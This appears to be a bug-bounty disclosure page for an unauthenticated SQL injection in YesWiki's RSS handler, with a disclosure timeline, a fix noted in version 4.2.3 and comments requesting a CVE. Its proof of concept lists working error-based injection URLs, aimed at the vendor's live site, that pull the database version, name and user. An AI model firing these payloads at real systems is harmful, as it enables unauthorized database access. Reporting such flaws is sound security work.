UnAuthenticated SQL Injection in yeswiki/yeswiki


Reported on

Jul 27th 2022

Proof of Concept

Vendor Domain 
Print version: https://yeswiki.net/?AccueiL/rss&id=1%27+and+extractvalue(0x0a,concat(0x0a,(select+version())))--+-
Print Database: https://yeswiki.net/?AccueiL/rss&id=1%27+and+extractvalue(0x0a,concat(0x0a,(select+database())))--+-
Print User: https://yeswiki.net/?AccueiL/rss&id=1%27+and+extractvalue(0x0a,concat(0x0a,(select+user())))--+-

Local Hosted:
Print All:,concat(0x0a,(select+concat_ws(0x207c20,version(),database(),user()))))--+-

Find Attached Images for your reference:

LocalHost POC:

Vendor Domain POC:


SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.

SQL Injection is very common with PHP and ASP applications due to the prevalence of older functional interfaces. Due to the nature of programmatic interfaces available, J2EE and ASP.NET applications are less likely to have easily exploited SQL injections. The severity of SQL Injection attacks is limited by the attacker’s skill and imagination, and to a lesser extent, defense in depth countermeasures, such as low privilege connections to the database server and so on. In general, consider SQL Injection a high impact severity.


Don't Know :)

We are processing your report and will contact the yeswiki team within 24 hours. a year ago
We have contacted a member of the yeswiki team and are waiting to hear back a year ago
We have sent a follow up to the yeswiki team. We will try again in 7 days. a year ago
Jérémy Dufraisse validated this vulnerability a year ago
AggressiveUser has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
a year ago


Hi @maintainer, Please allow @admin to assign CVE ID on this report after fix

We have sent a fix follow up to the yeswiki team. We will try again in 7 days. a year ago
Jérémy Dufraisse marked this as fixed in 4.2.3 with commit fd59bc a year ago
Jérémy Dufraisse has been awarded the fix bounty
This vulnerability will not receive a CVE
RssHandler.php#L19 has been validated
a year ago


Dear @maintainer / @admin , can i have CVE for this report ?

Jamie Slome
a year ago


Happy to assign a CVE once we get the go-ahead from the maintainer 👍

a year ago


@maintainer Please help us out with this :)

10 months ago


@maintainer ?

to join this conversation